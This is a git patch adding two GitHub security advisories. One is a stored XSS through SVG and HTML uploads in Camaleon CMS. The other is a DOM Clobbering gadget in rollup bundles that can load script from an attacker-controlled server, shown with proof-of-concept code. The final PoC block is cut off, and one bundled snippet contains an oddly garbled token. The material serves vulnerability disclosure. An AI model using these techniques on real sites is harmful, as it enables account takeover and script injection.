From 8a8eaecd8f6f9aa40427a4004add35d1b9c611c9 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Sep 2024 22:12:03 +0000 Subject: [PATCH] Publish Advisories GHSA-8fx8-3rg2-79xw GHSA-gcx4-mw62-g8wm --- .../GHSA-8fx8-3rg2-79xw.json | 65 ++++++++++++ .../GHSA-gcx4-mw62-g8wm.json | 100 ++++++++++++++++++ 2 files changed, 165 insertions(+) create mode 100644 advisories/github-reviewed/2024/09/GHSA-8fx8-3rg2-79xw/GHSA-8fx8-3rg2-79xw.json create mode 100644 advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json diff --git a/advisories/github-reviewed/2024/09/GHSA-8fx8-3rg2-79xw/GHSA-8fx8-3rg2-79xw.json b/advisories/github-reviewed/2024/09/GHSA-8fx8-3rg2-79xw/GHSA-8fx8-3rg2-79xw.json new file mode 100644 index 0000000000000..14443976286a7 --- /dev/null +++ b/advisories/github-reviewed/2024/09/GHSA-8fx8-3rg2-79xw/GHSA-8fx8-3rg2-79xw.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8fx8-3rg2-79xw", + "modified": "2024-09-23T22:10:33Z", + "published": "2024-09-23T22:10:33Z", + "aliases": [ + + ], + "summary": "Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184)", + "details": "A stored cross-site scripting has been found in the image upload functionality that can be used by normal registered users: It is possible to upload a SVG image containing JavaScript and it's also possible to upload a HTML document when the format parameter is manually changed to [documents][1] or a string of an [unsupported format][2]. If an authenticated user or administrator visits that uploaded image or document malicious JavaScript can be executed on their behalf\n(e.g. changing or deleting content inside of the CMS.)\n\n[1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106\n[2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111\n\n## Impact\n\nThis issue may lead to account takeover due to reflected Cross-site scripting (XSS).\n\n## Remediation\n\nOnly allow the upload of safe files such as PNG, TXT and others or serve all \"unsafe\" files such as SVG and other files with a content-disposition: attachment header, which should prevent browsers from displaying them.\n\nAdditionally, a [Content security policy (CSP)][3] can be created that disallows inlined script. (Other parts of the application might need modification to continue functioning.)\n\n[3]: https://web.dev/articles/csp\n\nTo prevent the theft of the auth_token it could be marked with HttpOnly. This would however not prevent that actions could be performed as the authenticated user/administrator. Furthermore, it could make sense to use the authentication provided by Ruby on Rails, so that stolen tokens cannot be used anymore after some time.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "RubyGems", + "name": "camaleon_cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.8.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/owen2345/camaleon-cms" + }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/GHSA-r9cr-qmfw-pmrc.yml" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-09-23T22:10:33Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json b/advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json new file mode 100644 index 0000000000000..4f100763f6f5a --- /dev/null +++ b/advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json @@ -0,0 +1,100 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcx4-mw62-g8wm", + "modified": "2024-09-23T22:11:02Z", + "published": "2024-09-23T22:11:02Z", + "aliases": [ + "CVE-2024-47068" + ], + "summary": "DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS", + "details": "### Summary\n\nA DOM Clobbering vulnerability was discovered in rollup when bundling scripts that use `import.meta.url` or with plugins that emit and reference asset files from code in `cjs`/`umd`/`iife` format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.\n\nIt's worth noting that similar issues in other popular bundlers like Webpack ([CVE-2024-43788](https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986)) have been reported, which might serve as a good reference.\n\n### Details\n\n#### Backgrounds\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n#### Gadget found in `rollup`\n\nA DOM Clobbering vulnerability in `rollup` bundled scripts was identified, particularly when the scripts uses `import.meta` and set output in format of `cjs`/`umd`/`iife`. In such cases, `rollup` replaces meta property with the URL retrieved from `document.currentScript`.\n\nhttps://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162\n\nhttps://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185\n\nHowever, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the `src` attribute of the attacker-controlled element (e.g., an `img` tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.\n\n### PoC\n\nConsidering a website that contains the following `main.js` script, the devloper decides to use the `rollup` to bundle up the program: `rollup main.js --format cjs --file bundle.js`.\n\n```\nvar s = document.createElement('script')\ns.src = import.meta.url + 'extra.js'\ndocument.head.append(s)\n```\n\nThe output `bundle.js` is shown in the following code snippet.\n\n```\n'use strict';\n\nvar _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;\nvar s = document.createElement('script');\ns.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';\ndocument.head.append(s);\n```\n\nAdding the `rollup` bundled script, `bundle.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server` due to the introduced gadget during bundling. The attacker only needs to insert an `img` tag with the name attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n```\n\n\n
\n